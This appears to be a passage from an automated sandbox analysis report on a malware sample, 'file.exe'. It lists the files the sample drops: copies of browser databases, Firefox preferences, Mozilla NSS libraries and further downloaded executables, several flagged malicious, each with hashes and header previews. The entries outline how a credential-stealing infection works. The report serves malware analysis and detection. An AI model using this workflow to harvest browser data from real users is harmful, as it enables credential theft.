Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGDBFBGIDHCAAKEBAKFIIIEBAA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGCFHIDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGDAAKJJDAAKFHJKJKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJJEGIEHIJKKFIDHDGID

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HJKJEHJKJEBGHJJKEBGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KECBKKEBKEBFCAAAEGDHDGIIJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFIIJJJDGCBAAKFIIECGCFBAFB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJEBKJDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, Detection: malicious, Browse Filename: i3NmF0obCm.exe, Detection: malicious, Browse Filename: Wf9qnVcbi8.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, Detection: malicious, Browse Filename: i3NmF0obCm.exe, Detection: malicious, Browse Filename: Wf9qnVcbi8.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1938944
Entropy (8bit):	7.95053314810316
Encrypted:	false
SSDEEP:	24576:QeYfsNZDecs30G1mI9DBDUZi9dEoQE+0PzxXPjXpMW09LGtQPIamK9xdvoUWV:QeFzaSId2od+0dfLryLMazNob
MD5:	4E12569D3C3E421F624FD7560AC127A2
SHA1:	26F8C2A60857610D52A0059D77ADE380FFAB43E3
SHA-256:	F20BE87E9914AE3B7F6043CC3486A0341EE4A7C3CF77775173A3F5A76BBC1349
SHA-512:	D5889CBE06FAFB6BA5AAEC3C144B3ADF9DFDFA1567474C65F7D4470A71B0134E40CE675EC338701DFE619FAF6D74A5B0AD745ED11FBBD5F757B0E430F1E262AE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................L...........@...........................L...........@.................................X...l.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...gxzeqrwn.....02..~..................@...fgoahxou......L......p..............@....taggant.0....L.."...t..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2545664
Entropy (8bit):	7.981821383012884
Encrypted:	false
SSDEEP:	49152:rLZkC1yr3UfAdY31fHI7/IBIf0qHKSrynh7ncz9g+rVbKE6psgHC3:HZkC1OUS2ZowBWpBrIcCpsoC
MD5:	05DDA1C444FE4FEDA4771F75598D55D7
SHA1:	3369DEEFD76EA12C621AAD635547BE857720D7D8
SHA-256:	9A501E3C19A488AB6672598E26AF59A019C471AAF67ADCD1DBA4734D7A2B9E48
SHA-512:	01C7897FA5995332C466035F62E45FAF12FF0CEAD90655DF53C0B493833656C177B53594A0D8300C792FC43D2F6DAA577E3F949F6E9118C950472D1A85AC6160
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L....A.f......................!...................@.......................................@... .. .... .. .......... 0..z....>...............................0..........................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@............@y...#..(..................@....data....."......."..4..............@...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
